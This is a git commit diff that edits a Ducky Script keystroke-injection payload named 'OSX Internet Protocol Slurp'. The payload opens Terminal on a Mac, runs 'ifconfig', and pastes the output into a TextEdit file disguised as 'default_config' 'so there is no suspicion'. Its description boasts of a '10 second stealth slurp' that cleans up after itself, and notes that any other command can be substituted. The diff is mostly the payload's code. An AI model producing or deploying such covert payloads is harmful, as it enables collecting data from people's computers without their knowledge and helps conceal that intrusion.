Added code tags along with punctuation improvements.

This commit is contained in:
Adam 2015-10-05 01:24:08 -05:00
parent 9a4dfcd818
commit 6819f49335
1 changed files with 9 additions and 4 deletions

View File

@ -1,7 +1,8 @@
REM Title: OSX Internet Protocol Slurp
REM Author: Cameron Glass
REM Description: This payload quickly copies down information gathered from terminal's command "ifconfig" and pastes it in a file called "default_config" in the Documents folder (Or whatever the default folder may be). This payload also quickly cleans up after itself so that you can open the notepad later and look at the information.
REM ----------------------------------
REM Description: This payload quickly copies down information gathered from terminal’s command “ifconfig” and pastes it in a file called "default_config" (So there is no suspicion) in the Documents folder. This payload also quickly cleans up after itself allowing for a 10 second stealth slurp. If need be you may change the command "ifconfig" to any other command such as "ls" or others.
```
REM -——————————————OS Internet Protocol Slurp-
DELAY 1000
GUI SPACE
DELAY 100
@ -20,7 +21,7 @@ GUI Q
DELAY 100
GUI SPACE
DELAY 100
STRING notes
STRING textedit
DELAY 100
ENTER
DELAY 1000
@ -28,4 +29,8 @@ GUI A
DELAY 100
GUI V
DELAY 100
GUI Q
GUI Q
DELAY 500
STRING default_config
ENTER
```